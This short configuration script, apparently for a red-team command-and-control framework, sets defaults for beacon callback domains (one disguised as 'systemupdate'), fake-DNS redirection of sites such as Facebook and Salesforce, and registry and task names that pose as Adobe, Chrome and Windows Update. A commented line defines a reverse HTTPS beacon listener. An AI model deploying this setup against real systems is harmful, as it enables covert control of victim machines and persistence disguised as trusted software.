# a few defaults to be used later by scripts.

pref_set_list("beacon-callback-domain.prefs", @("s.domain.org", "arse.domain.org", "systemupdate.domain.org"));
pref_set_list("bap2.prefs", @("/"));
pref_set_list("fakedns-redirection.prefs", @("www.facebook.com","www.salesforce.com"))
pref_set_list("log.prefs", @("/var/log/messages"))
pref_set_list("regname.prefs", @("Adobe","GoogleChrome","Firefox","WindowsUpdate"))
pref_set_list("tasknames.list", @("Adobe","GoogleChrome","Firefox","WindowsUpdate"))

#pref_set_list("listener1.prefs", @("revhttps","windows/beacon_http/reverse_https","192.168.0.7",""))

